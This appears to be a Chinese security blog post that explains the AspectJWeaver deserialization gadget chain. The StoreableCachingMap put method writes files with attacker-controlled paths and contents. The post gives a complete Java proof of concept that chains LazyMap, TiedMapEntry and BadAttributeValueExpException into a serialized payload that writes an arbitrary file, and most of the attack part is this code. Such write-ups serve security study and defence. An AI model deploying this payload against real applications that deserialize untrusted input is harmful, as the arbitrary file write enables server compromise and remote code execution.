当前位置：首页 > news >正文

AspectJWeaver反序列化

news 来源：原创 2024/9/24 3:22:21

AspectJWeaver反序列化

其实没有什么好讲的，随便水一下，因为学过cc链都知道了利用

aspectjweaver中有一个SimpleCache类，SimpleCache类中的内部类StoreableCachingMap是一个继承HashMap的类。

看到它的put方法

public Object put(Object key, Object value) {try {String path = null;byte[] valueBytes = (byte[]) value;if (Arrays.equals(valueBytes, SAME_BYTES)) {path = SAME_BYTES_STRING;} else {path = writeToPath((String) key, valueBytes);}Object result = super.put(key, path);storeMap();return result;} catch (IOException e) {trace.error("Error inserting in cache: key:"+key.toString() + "; value:"+value.toString(), e);Dump.dumpWithException(e);}return null;}

一眼顶真可以写文件，跟进writeToPath((String) key, valueBytes)

private String writeToPath(String key, byte[] bytes) throws IOException {String fullPath = folder + File.separator + key;FileOutputStream fos = new FileOutputStream(fullPath);fos.write(bytes);fos.flush();fos.close();return fullPath;
}

文件路径就是folder + File.separator + key;全部都是可以控制的

那怎么触发put方法，如果有cc的依赖的话，看到我们的lazymap

public Object get(Object key) {// create value for key if key is not currently in the mapif (map.containsKey(key) == false) {Object value = factory.transform(key);map.put(key, value);return value;}return map.get(key);}

懂的都懂了，也不需要我多说了
链子，yso里也有

import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;public class test {public static void main(String[] args) throws Exception {// 反射获取构造函数Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);con.setAccessible(true);// 实例化对象HashMap map = (HashMap)con.newInstance("D:", 1);// 这里用到ConstantTransformer是为了构造value，即写入文件的值ConstantTransformer transform = new ConstantTransformer("12321321".getBytes(StandardCharsets.UTF_8));// 返回一个LazyMap对象Map outmap = LazyMap.decorate(map,transform);// 利用TiedMapEntry和BadAttributeValueExpException，使反序列化BadAttributeValueExpException对象的时候触发LazyMap的get方法TiedMapEntry tiedmap = new TiedMapEntry(outmap,"1.txt");// 这里是为了序列化时不触发LazyMap的get方法BadAttributeValueExpException poc = new BadAttributeValueExpException(1);Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");val.setAccessible(true);val.set(poc,tiedmap);// 序列化ByteArrayOutputStream out = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(out);oos.writeObject(poc);System.out.println(Base64.getEncoder().encodeToString(out.toByteArray()));// 反序列化ByteArrayInputStream in = new ByteArrayInputStream(out.toByteArray());ObjectInputStream ois = new ObjectInputStream(in);ois.readObject();}
}